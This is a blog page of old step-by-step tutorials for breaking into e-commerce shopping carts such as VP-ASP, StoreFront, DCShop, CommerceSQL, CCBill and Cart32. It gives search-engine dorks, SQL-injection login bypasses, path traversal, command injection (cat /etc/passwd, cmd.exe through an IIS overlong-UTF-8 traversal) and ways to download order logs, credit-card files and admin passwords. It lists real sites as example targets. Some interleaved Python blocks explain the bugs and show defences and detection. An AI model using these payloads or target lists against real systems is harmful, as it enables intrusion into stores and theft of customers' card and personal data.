Note: in this write-up we try two methods.
- The first method gets into the shopadmin.asp page using SQL injection.
- The second method hunts for the *.mdb database file by way of the shopdbtest.asp file.
First method:
---------------
1. Start by looking for target sites running the VP-ASP Shopping Cart.
Search in every search engine: Google, AltaVista, Yahoo, etc.
Example: allinurl:vp-asp or allinurl:shopadmin.asp
2. Say we find a site with the VP-ASP cart, www.target.com.
The manual pattern looks like:
www.target.com/vp-asp dir/shopadmin.asp or www.target.com/shopadmin.asp
Note: it depends on where the site put the shopadmin.asp file.
3. Once we have the shopadmin.asp URL, we inject the SQL.
Enter the login and password injection.
Example:
www.target.com/vp-asp dir/shopadmin.asp
login : 'or''='        or        login : admin
passwd : 'or''='                 passwd : 'or''='
4. OK. If we get in, we see the contents of the admin database,
such as:
- Display Orders
- Display Products
- Edit Orders
- and so on.
Second method:
--------------
1. When the injection fails, we try to download the database :P~
2. The manual pattern uses shopdbtest.asp.
Example:
www.target.com/vp-asp dir/shopdbtest.asp or www.target.com/shopdbtest.asp
Note: it depends on where the site put the shopdbtest.asp file.
3. If we are lucky, we get information about the admin's database :)
The page shows:
- xDatabase
- xDblocation
- xdatabasetype
- xEmail
- xEmailName
- xEmailSubject
- xEmailSystem
- xEmailType
- xOrdernumber
4. Next we work out where the *.mdb file is.
How:
- xDatabase ---> the name of the *.mdb file.
- xDblocation ---> the directory of the *.mdb file.
Example:
- xDatabase = shopping200
- xDblocation = shop
gives:
www.target.com/shop/shopping200.mdb
5. After that the shopping200.mdb file downloads automatically :)
To view the contents of shopping200.mdb you can open it with MS Access.
6. OK, thanks, have fun trying....
Example targets:
http://www.bossant.com.cn/shop/shopping.mdb
http://www.youngsliquors.com/winestore/shopping300.mdb
http://www.jinhuaham.com/newshop/shopping.mdb
http://www.vienna-plan.at/shopa/shopping.mdb
http://www.crystalacarte.com/shopdbtest.asp
http://www.mediablend.com/demos/ecommerce/mbstore/store/shopdbtest.asp
http://www.armoredplanet.com/vpshop/shopdbtest.asp
http://www.adventureropes.com/Shopping/shopdbtest.asp
http://www.4urbike.com/shopdbtest.asp
http://www.bottegadelleapi.com/SHOP/shopdbtest.asp
http://www.decathlon.com.tw/demo/shopdbtest.asp
NEXT -----> Search Again !!!!
Note: this is the StoreFront SQL injection, tested on 6.0 and older versions.
Begin:
- Search in your search engine for a website that runs the StoreFront Shopping Cart.
- Because this is SQL injection through the login page, search for something like:
e.g. allinurl:StoreFront+login+page or another combination :)
(1) Found a target like this:
http://www.target.com/login.asp or http://www.target.com/storedir/login.asp
(2) This gives access to the first user in the database.
If an attacker knows the e-mail address of any registered user,
he can retrieve that registered user's information from this login page.
(3) And now an example injection against login.asp
e.g. http://www.target.com/login.asp
login : example@example.com --> or a registered e-mail address on that site.
passwd : ' or 'a'='a
The ShopPlus shopping cart system lets you build a store or a mall on the Internet.
Because of its flexibility, it allows you to sell virtually any products or services and
fully customize the shopping experience of your web site.
Owner :
http://www.ksofttech.com/help/shopplus/
Problem:
The script doesn't check for shell metacharacters; any user can execute commands on the web server.
Exploit:
http://target.com/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;uid|
http://target.com/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
Thanks
Bug file: admin page --> /admin
Display: http://target.com/s-cart/admin
1. Search in every search engine, e.g. --> allinurl:s-cart/index.phtml or "s-cart"
2. Get a target site like --> http://www.target.com/s-cart/index.phtml
3. Now go to the admin page by changing the URL to:
http://www.target.com/s-cart/admin --> the browser pops up a login and password prompt !!!
login : admin
passwd : 'or''='
4. If you are lucky, you will see the admin manager, can view the Order table, or deface the s-cart page.
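The same authentication-bypass payload turns up three times on this page: against VP-ASP's shopadmin.asp (first method above), StoreFront's login.asp, and the s-cart /admin prompt. The following is an added example, my own rather than code from any of those products: it uses an in-memory SQLite table as a stand-in for the Access or SQL Server back end (the quote handling that matters is the same), shows the query the server actually executes when the login form is string-concatenated, and puts the parameterised version next to it. The table, the admin row and its password are constructed.

```python
import sqlite3


def build_demo_db():
    """Constructed stand-in for a cart's admin table (example data only)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admins (login TEXT, passwd TEXT)")
    conn.execute("INSERT INTO admins VALUES ('admin', 'S3cret!')")
    return conn


def vulnerable_sql(login, passwd):
    """The classic ASP pattern:
    "... WHERE login='" & login & "' AND passwd='" & passwd & "'"
    The user's quotes become part of the SQL, so 'or''=' closes the
    literal and appends OR ''='' which is always true."""
    return "SELECT login FROM admins WHERE login='%s' AND passwd='%s'" % (login, passwd)


def vulnerable_login(conn, login, passwd):
    row = conn.execute(vulnerable_sql(login, passwd)).fetchone()
    return row[0] if row else None


def safe_login(conn, login, passwd):
    """Parameterised query: the payload's quotes are data, never SQL syntax."""
    row = conn.execute(
        "SELECT login FROM admins WHERE login=? AND passwd=?", (login, passwd)
    ).fetchone()
    return row[0] if row else None


def demonstrate():
    """Run the three payloads shown on this page against both versions."""
    conn = build_demo_db()
    payloads = [
        ("admin", "'or''='"),                  # VP-ASP / s-cart
        ("'or''='", "'or''='"),                # VP-ASP, both fields
        ("example@example.com", "' or 'a'='a"),  # StoreFront
    ]
    return {
        "vulnerable": [vulnerable_login(conn, l, p) for l, p in payloads],
        "safe": [safe_login(conn, l, p) for l, p in payloads],
        "legit": safe_login(conn, "admin", "S3cret!"),
    }


if __name__ == "__main__":
    print(vulnerable_sql("admin", "'or''='"))
    print(demonstrate())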
OK, let's try :P~
How:
1. You can simply try typing "PDG_Cart" into a search engine.
Once you have found a site that uses PDG_Cart.
EXAMPLE:
www.target.com/cgi-bin/PDG_Cart
2. Then just type the bug paths to get the MERCHANT login and password,
such as:
-order.log
-shopper.conf
-Auth.log
-Auth_Admin.log
-authorizenet.log
-etc.
example: www.target.com/cgi-bin/PDG_Cart/shopper.conf
MIDICART is an ASP and PHP based shopping cart application with an MS Access or SQL database.
A security vulnerability in the product allows remote attackers to download the product's
database and thus gain access to sensitive information about users of the product
(name, surname, address, e-mail, phone number, credit card number, and company name).
Example:
Accessing the following URL will return the database used by the product:
http://www.target.com/shoppingdirectory/midicart.mdb
e.g :
http://www.cc200.com/branches/pes/midicart/shop/midicart.mdb
So Download Now !!!
Thanks
How: search all the search engines
1. You can simply try typing "mall2000.cgi" into a
search engine, or look at http://www.ezmall2000.com/
Once you have found a site that uses mall2000.cgi
EXAMPLE:
http://www.lexicom.ab.ca/cgi-bin/ezmall2000b/mall2000.cgi?
2. Second step, just type " &page=../ "
like this:
example:
http://www.lexicom.ab.ca/cgi-bin/ezmall2000b/mall2000.cgi?&page=../
3. Then type the bug paths to get the data listing or the
credit cards from transactions on that site,
such as:
-order.log
-error.log
-access.log
-etc.
example:
http://www.lexicom.ab.ca/cgi-bin/ezmall2000b/mall2000.cgi?&page=../order.log
4. Once you have it, don't shout too loudly or your friends will find out;
my advice is to keep trying often, OK.
5. Read the other shopping cart tutorials too.
6. THANKS
Bug file: /forumcgi/display.cgi?
Display: http://www.target.com/encore/forumcgi/display.cgi?
1. Search in every search engine, e.g. --> allinurl:forumcgi/display.cgi?
2. Get a target site like --> http://www.target.com/encore/forumcgi/display.cgi?preftemp=temp
3. Now go to the exploit by inserting this code:
&page=anonymous&file=|uname%20-a|
4. The full URL looks like:
http://www.target.com/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=|uname%20-a|
5. Linux or Unix commands are available here... Good luck :P~
Before hunting for bugs in DCShop
you have to take a long, deep breath first, OK. Here is how:
1. Open a search engine (www.altavista.com or www.google.com)
2. Enter the keyword 'url:DCShop'
and the search engine will find all links
that contain DCShop.
3. Say you get the URL:
http://theTargetHost/cgi-bin/DCShop/
4. Then to get the CC list and the orders from that site
you just append to it:
"Orders/orders.txt"
so in full it becomes:
http://theTargetHost/cgi-bin/DCShop/Orders/orders.txt
5. Next you can also find the list of administrator names
and passwords by appending the keyword:
"Auth_data/auth_user_file.txt"
so in full it becomes:
http://theTargetHost/cgi-bin/DCShop/Auth_data/auth_user_file.txt
6. OK, that's it for now.... have fun trying.............
I am just a kid.
I just want to know about this shopping cart.
The CommerceSQL shopping cart uses Perl scripts for processing data and orders.
You can see more information about the CommerceSQL shopping cart at
http://commercesql.com.
I have found out the full path from / (the base directory), or the path of
files starting from the folder in which index.cgi resides.
Begin:
Search in your search engine for a website that has the CommerceSQL Shopping Cart.
(1) Found a target like this:
http://www.target.com/cgi-bin/commerceSQL/index.cgi
Anyway, the useful files I've found so far are: ?page=../index.cgi
example:
http://www.target.com/cgi-bin/commerceSQL/index.cgi?page=../index.cgi
(2) This is the file where you will find the paths to the shop admin
files:
?page=../admin/manager.cgi
example:
http://www.target.com/cgi-bin/commerceSQL/index.cgi?page=../admin/manager.cgi
(3) This is the file where you will find the paths to the admin configuration file,
and this is where you'll find the database file name, username and
password to access it:
?page=../admin/admin_conf.pl
or
?page=../admin/configuration.pl
?page=../admin/admin_conf.pl
?page=../admin/html_lib.pl
example:
http://www.target.com/cgi-bin/commerceSQL/index.cgi?page=../admin/admin_conf.pl
(4) This is the file where you will find the Order log:
?page=../admin/files/order.log
example:
http://www.target.com/cgi-bin/commerceSQL/index.cgi?page=../admin/files/order.log
(5) Good luck !!! and sorry, my English is bad :P
Recently there have been many hacking attempts against e-commerce sites
that use CCBill to process credit cards. Some of my clients' sites were
hacked and defaced through this vulnerability. On the Incidents list,
some people have already mentioned it. I took a look at the
actual problem and found that the vulnerability is in whereami.cgi
in the /ccbill/ directory. That script allows attackers to run commands
without authorization.
Example :
http://victimhost/ccbill/whereami.cgi?g=cat%20../../../../etc/password
Thanks
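Every CGI on this page that takes a page= or file= value (mall2000.cgi with ?page=../order.log, the Encore display.cgi with file=|uname%20-a|, shopplus.cgi with file=;uid|, commerceSQL index.cgi with ?page=../admin/admin_conf.pl) hands that value to a file open. In Perl a 2-argument open() treats a trailing '|' as "run this command and read its output", which is why the pipe payloads give command execution while '../' gives arbitrary file reads. CCBill's whereami.cgi?g= is the simpler case of the parameter going straight into a shell command; the only fix there is not to build a shell command from it at all. The following is an added example, mine and not code from any of these products: a small model of how Perl's open() reads such a string, next to the check a patched script should perform before opening anything. The directory tree, file names and allowed extensions are constructed assumptions.

```python
import tempfile
from pathlib import Path


class PageError(ValueError):
    """Raised when a page= / file= value must not be opened."""


def perl_two_arg_open_kind(name):
    """Model of how Perl's 2-argument open(FH, $name) interprets $name.
    Trailing '|': run $name as a shell command and read its output.
    Leading '|': open a pipe into a command. Leading '<', '>', '>>',
    '+<', '+>': mode prefix. Anything else: a plain file path."""
    s = name.strip()
    if s.endswith("|"):
        return "command-read"
    if s.startswith("|"):
        return "command-write"
    if s.startswith((">>", "+<", "+>", "<", ">")):
        return "mode-prefix"
    return "file"


ALLOWED_SUFFIXES = {".html", ".htm", ".txt"}  # assumption: only templates are servable


def resolve_page(pages_dir, page):
    """Return the template file to serve for ?page=<page>, or raise PageError.
    Metacharacters are refused outright (not stripped), '..' and absolute
    paths are refused, and the resolved real path must sit inside pages_dir."""
    if not page or "\0" in page:
        raise PageError("empty or NUL byte")
    if any(c in page for c in "|;&`$<>\n\r"):
        raise PageError("shell/pipe metacharacter in %r" % page)
    rel = Path(page)
    if rel.is_absolute() or ".." in rel.parts:
        raise PageError("traversal in %r" % page)
    base = Path(pages_dir).resolve()
    target = (base / rel).resolve()  # resolve() also follows symlinks
    if base not in target.parents:
        raise PageError("%r resolves outside %s" % (page, base))
    if target.suffix not in ALLOWED_SUFFIXES or not target.is_file():
        raise PageError("%r is not a servable template" % page)
    return target


def make_demo_tree():
    """Constructed layout mirroring the tutorials: a pages dir for the CGI with
    the admin files one level up, so '../admin/admin_conf.pl' is exactly the
    request that must be refused."""
    root = Path(tempfile.mkdtemp(prefix="cart-"))
    (root / "admin").mkdir()
    (root / "admin" / "admin_conf.pl").write_text("$db_pass = 'example-only';\n")
    (root / "pages").mkdir()
    (root / "pages" / "welcome.html").write_text("<h1>Welcome</h1>\n")
    return root


def demo():
    """Try the page's payloads against the check; returns {payload: outcome}."""
    pages = make_demo_tree() / "pages"
    attempts = ["welcome.html", "../admin/admin_conf.pl", "../order.log",
                "|uname -a|", ";uid|", "/etc/passwd"]
    results = {}
    for a in attempts:
        try:
            results[a] = "served " + resolve_page(pages, a).name
        except PageError as e:
            results[a] = "refused: " + str(e)
    return results


if __name__ == "__main__":
    for payload, outcome in demo().items():
        print("%-26s open() sees: %-14s check: %s"
              % (payload, perl_two_arg_open_kind(payload), outcome))
```

The allowlist of metacharacters is the belt; the resolved-path containment check is the braces. Dropping either one reopens one of the two bug classes on this page: without the containment check a '..' hidden behind a symlink still escapes, and without the metacharacter refusal a 3-argument open() in Perl would close the pipe hole but a later system() call on the same value would not.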
NB: This can only be used on certain sites that have the same weakness.
Step 1: First find a Cart32 v3.5a website.
Step 2: Search in all the search engines you know
with the keyword " Cart32 v3.5a "
Step 3: Go to the cart32.exe page
http://target/login/unicode/cart32.exe
(example: http://www.connectionsmall.com/scripts/cart32.exe/)
Step 4: Once you are there, you will be shown a page
like the one below:
Cart32 v3.5a
Step 4 (continued): Now what you have to do is append the following
extensions to the end of the URL; 98% of the time #1 and #2 work
a. (..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\)
b. (..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\)
c. (..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\)
ONLY WORKS OCCASIONALLY!
(example: http://www.connectionsmall.com/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\)
Step 5: Once you are in the root directory (c:\), to get to the
CCs, append (\progra~1\MWAInc\Cart32\) to the end of that URL
so that you now see something like:
http://www.connectionsmall.com/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\progra~1\mwainc\cart32\
Now you can see many files such as:
2814659000-001001.c32
2814659000-001002.c32
2814659000-001003.c32
Step 6: Copy one of those file names and then
append it to the end of the URL, so it looks like: http://www.connectionsmall.com/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+type+c:\progra~1\mwainc\cart32\2814659000-001003.c32
Note: there you will see other files that contain lots of
CCs, such as:
RONACK-orders.txt (this file is not on this particular site)
procure-orders.txt (this file is not on this particular site)
Step 7: Before you access the other file types, you first have to change
*c+dir+c:\* to *c+type+c:\*
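The three URL forms in step 4 above are not Cart32 bugs at all but the IIS web server folder traversal: %c0%af and %e0%80%af are overlong UTF-8 encodings of '/', %c1%9c is an overlong '\', and IIS only turned them into path separators after its '..' check had already run on the raw bytes. Anything reachable through /scripts/ could then run cmd.exe, and Cart32's order files were just what this tutorial chose to read with it. The following is an added detection example, mine and not from any vendor or from the page: it decodes request paths the lenient way the vulnerable server did, then flags any request that climbs above the web root, rather than grepping for a fixed list of encodings. The log lines are constructed (Common Log Format, documentation IP ranges).

```python
import re
from urllib.parse import unquote_to_bytes

REQ = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

# Constructed sample log lines; not taken from any real server.
SAMPLE_LOG = [
    r'203.0.113.5 - - [10/Oct/2000:13:55:36 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 200 1234',
    r'203.0.113.5 - - [10/Oct/2000:13:55:40 -0700] "GET /scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+type+c:\progra~1\mwainc\cart32\2814659000-001003.c32 HTTP/1.0" 200 4096',
    r'198.51.100.7 - - [10/Oct/2000:14:02:11 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312',
    r'192.0.2.9 - - [10/Oct/2000:14:05:00 -0700] "GET /index.html HTTP/1.0" 200 2048',
    r'192.0.2.9 - - [10/Oct/2000:14:05:03 -0700] "GET /images/../index.html HTTP/1.0" 200 2048',
]


def lenient_utf8(b):
    """Decode UTF-8 the way the vulnerable IIS did: overlong sequences such as
    C0 AF ('/') and C1 9C ('\\') are accepted instead of rejected, so a
    separator hidden this way survives a check on the raw bytes."""
    out, i = [], 0
    while i < len(b):
        c = b[i]
        if c < 0x80:
            out.append(chr(c))
            i += 1
            continue
        if 0xC0 <= c < 0xE0:
            n, cp = 1, c & 0x1F
        elif 0xE0 <= c < 0xF0:
            n, cp = 2, c & 0x0F
        elif 0xF0 <= c < 0xF8:
            n, cp = 3, c & 0x07
        else:
            out.append("\ufffd")
            i += 1
            continue
        seq = b[i + 1:i + 1 + n]
        if len(seq) < n or any(x & 0xC0 != 0x80 for x in seq):
            out.append("\ufffd")
            i += 1
            continue
        for x in seq:
            cp = (cp << 6) | (x & 0x3F)
        out.append("\ufffd" if cp > 0x10FFFF or 0xD800 <= cp <= 0xDFFF else chr(cp))
        i += 1 + n
    return "".join(out)


def decode_path(raw_path):
    """Percent-decode, lenient-UTF-8-decode, and fold '\\' into '/' as Windows does."""
    path = raw_path.split("?", 1)[0]  # the query string is not part of the file path
    return lenient_utf8(unquote_to_bytes(path)).replace("\\", "/")


def is_traversal(decoded):
    """True if '..' ever climbs above the web root; '/images/../index.html' is fine."""
    depth = 0
    for part in decoded.split("/"):
        if part == "..":
            depth -= 1
            if depth < 0:
                return True
        elif part and part != ".":
            depth += 1
    return False


def analyze(line):
    m = REQ.search(line)
    if not m:
        return None
    raw = m.group(1)
    raw_bytes = unquote_to_bytes(raw.split("?", 1)[0])
    decoded = decode_path(raw)
    reasons = []
    if lenient_utf8(raw_bytes) != raw_bytes.decode("utf-8", "replace"):
        reasons.append("overlong-utf8")   # a strict decoder would have rejected it
    if is_traversal(decoded):
        reasons.append("traversal")
    if "cmd.exe" in decoded.lower():
        reasons.append("cmd.exe")
    return {"raw": raw, "decoded": decoded, "reasons": reasons}


def scan(lines):
    """[(line_index, reasons)] for every request worth an alert."""
    return [(i, a["reasons"]) for i, a in enumerate(map(analyze, lines)) if a and a["reasons"]]


if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_LOG):
        print(i, reasons, analyze(SAMPLE_LOG[i])["decoded"])
```

Decoding first and walking the path second is the whole point: a rule that only matches '%c0%af' misses the '%e0%80%af' and '%c1%9c' forms on this very page, and the fixed server made the same change, canonicalising before checking.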
TUTORIAL II : Cart32 v3.5a
Target: http://www.partybows.com
1. Go to http://www.partybows.com
2. Click http://www.partybows.com/seasonal.htm
3. Enter Quantity = 1; basically pretend you are buying, and click order
4. You will end up here:
https://secure.axionet.com/partybows/cgi-bin/cart32.exe/partybows-AddItem
5. Change it to
https://secure.axionet.com/partybows/cgi-bin/cart32.exe/error
Cart32 v3.5 Error
CART32 Build 619
The following internal error has occurred: Invalid procedure
Error Number = 5
Click Here For Possible Solutions
etc.
6. Look for the order log
Cart32 Setup Info and Directory
Mail Server = mail.axion.net Section=Main
AdminDir = D:\secure\webroot\partybows\cgi-bin\cart32\
So the file is partybows-orders.txt.
Which finally gives:
http://www.partybows.com/cgi-bin/cart32/partybows-orders.txt
7. Or to get the admin password, just type cart32.ini
https://secure.axionet.com/partybows/cgi-bin/cart32.ini
Without meaning to, you will download the admin password
stored in the cart32.ini file.
You will get the admin password in encrypted form;
then try to decrypt it with the software
" Cart32decoder.exe "
8. To get the client names and passwords on Cart32
you can try typing "CLIENT.DBF"
or:
the order file at "ORDER" or "ORDERS.DBF"
TUTORIAL III : Cart32 v3.5a
search +/scripts/cart32.exe/
Exploitable Directories
-/scripts/cart32.ini
-/scripts/cart32.exe
-/scripts/cart32.exe/cart32clientlist
-/script/c32web.exe/ChangeAdminPassword
-/scripts/c32web.exe
-cgi-shl/c32web.exe/
Wherever there is a cart32.exe, add /cart32clientlist to the end of it
and erase the rest; a menu will come up with a submit box, click go;
it will list ALL clients and their passwords; the passwords will be encrypted.
After decrypting the password, go to wherever the [c32web.exe] file is.
That's the instructions with exploits from that channel we were just in called
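Most of this page is one bug in different clothes: order logs, credential files and Access databases sitting inside the document root where a plain GET fetches them (VP-ASP's shopdbtest.asp and *.mdb, DCShop's orders.txt and auth_user_file.txt, PDG_Cart's shopper.conf, MIDICART's midicart.mdb, Cart32's cart32.ini and *-orders.txt). The following is an added example, my own and not code from any of these products, written from the defender's side: a check you can run against a cart you are responsible for to confirm none of those files answer, which also walks the VP-ASP chain from shopdbtest.asp output to the database URL. It assumes shopdbtest.asp prints 'key = value' lines (the page shows xDatabase = shopping200 / xDblocation = shop) and that xDblocation is relative to the base URL; the path list and the fake site used for the offline demo are constructed.

```python
import re
import urllib.request
from urllib.error import HTTPError, URLError
from urllib.parse import urljoin

# Relative paths the tutorials above fetch directly; assumed locations, adjust for your install.
EXPOSED_PATHS = [
    "shopdbtest.asp",                               # VP-ASP: prints xDatabase / xDblocation
    "cgi-bin/DCShop/Orders/orders.txt",             # DCShop order log
    "cgi-bin/DCShop/Auth_data/auth_user_file.txt",  # DCShop admin credentials
    "cgi-bin/PDG_Cart/shopper.conf",                # PDG_Cart merchant config
    "cgi-bin/PDG_Cart/order.log",
    "scripts/cart32.ini",                           # Cart32 admin password
    "midicart.mdb",                                 # MIDICART database
]
MDB_MAGIC = b"\x00\x01\x00\x00Standard Jet DB"      # first bytes of a JET (.mdb) file


def mdb_url_from_dbtest(base_url, dbtest_text):
    """Rebuild the .mdb URL from shopdbtest.asp output the way the VP-ASP method does."""
    db = re.search(r"xDatabase\s*=\s*(\S+)", dbtest_text)
    if not db:
        return None
    name = db.group(1)
    if not name.lower().endswith(".mdb"):
        name += ".mdb"
    loc = re.search(r"xDblocation\s*=\s*(\S*)", dbtest_text)
    folder = loc.group(1).strip("/") + "/" if loc and loc.group(1) else ""
    return urljoin(base_url, folder + name)


def http_fetch(url, timeout=10):
    """Live fetcher: (status, first 4 KiB). Only use against hosts you are authorised to test."""
    req = urllib.request.Request(url, headers={"User-Agent": "exposed-file-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as r:
            return r.status, r.read(4096)
    except HTTPError as e:
        return e.code, b""
    except URLError:
        return None, b""


def check_exposed(base_url, fetch=http_fetch, paths=EXPOSED_PATHS):
    """[(url, kind)] for every path answering 200; kind is 'mdb' when the body starts
    with the JET header, else 'readable'. A reachable shopdbtest.asp is followed to
    the database it points at, exactly as the second VP-ASP method does."""
    findings = []
    for p in paths:
        url = urljoin(base_url, p)
        status, body = fetch(url)
        if status != 200:
            continue
        findings.append((url, "mdb" if body.startswith(MDB_MAGIC) else "readable"))
        if p.endswith("shopdbtest.asp"):
            mdb = mdb_url_from_dbtest(base_url, body.decode("latin-1"))
            if mdb:
                st, b2 = fetch(mdb)
                if st == 200:
                    findings.append((mdb, "mdb" if b2.startswith(MDB_MAGIC) else "readable"))
    return findings


def fake_fetch(url):
    """Constructed responses standing in for a vulnerable VP-ASP + DCShop install."""
    site = {
        "http://www.target.com/shopdbtest.asp":
            b"xDatabase = shopping200\nxDblocation = shop\nxEmail = owner@example.com\n",
        "http://www.target.com/shop/shopping200.mdb": MDB_MAGIC + b"\x00" * 48,
        "http://www.target.com/cgi-bin/DCShop/Orders/orders.txt": b"1001|J. Doe|example only\n",
    }
    body = site.get(url)
    return (200, body) if body is not None else (404, b"")


def demo():
    """Offline run against the fake site; swap fetch=http_fetch for a real check."""
    return check_exposed("http://www.target.com/", fetch=fake_fetch)


if __name__ == "__main__":
    for url, kind in demo():
        print(kind, url)
```

A 200 with the JET header is the finding that matters most, since the database holds everything the carts collected; a 200 on any of the text files is a finding too, because on this page each of them carried either credentials or card numbers. The fix is the same for all of them: keep data files outside the document root, and where the software will not allow that, deny the web server read access to them.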
1 comment:
This is confusing, bro :v